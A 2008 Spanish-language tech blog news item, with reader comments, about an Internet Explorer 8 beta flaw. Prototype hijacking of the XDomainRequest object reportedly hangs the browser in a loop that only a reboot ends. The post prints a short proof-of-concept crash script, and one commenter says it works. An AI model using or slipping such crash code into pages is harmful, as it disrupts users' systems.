Cuelga Internet Explorer 8 con un simple script

:

colgar, internet explorer, navegador, Script, seguridad informatica

Cuelga Internet Explorer 8 con un simple script

Martes 1 de Abril, 2008 por Antonio Online

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una característica nueva que permiten las llamadas XML entre dominios. Este ataque es similar al de XMLHttpRequest, del año 2006.

Internet Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, provocando así un ataque infinito, teniendo como única solución: reiniciar el sistema.

El ataque puede realizarse con el siguiente código:

<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
Noticia sobre: criticas, internet, microsoft, seguridad, software
Noticias relacionadas Ver más artículos

6 comentarios sobre “Cuelga Internet Explorer 8 con un simple script”

  1. Browser Killer:

    Comprobado, funciona. Algunos están todavía en Explorer 6 y ustedes ya conocen errores del 8, buen ritmo, saludos!

  2. » Cuelga Internet Explorer 8 con un simple script | Informática Práctica |:

    [...] Vía: | XKOD [...]

  3. J.F.:

    Increíble, muy bueno.
    Un saludo Anthony :P

  4. Anthony Paredes:

    @Manuel, lee aquí:
    http://www.0×000000.com/?i=543

    Te enterarás con más detalle, esa es mi fuente.

  5. h@nz …el Geek:

    Menos mal que aún esta en Beta, sino, me preocuparía… :D

    A ver, lanzamos una bombita de Firefox en Beta!??? :D

    Saludos.

  6. Video: Hackeando tarjetas con RFID en minutos:

    [...] tecnología es vulnerable, sea la que sea, esto le acaba de ocurrir a las tarjetas con [...]

Comenta este artículo Nota: Los comentarios escritos en mayúsculas o tipo SMS serán eliminados, al igual que los comentarios ofensivos o sin educación contra los lectores y/o editores de este medio.



© CREACTIVITY FOCUS S.R.L Todos los derechos reservados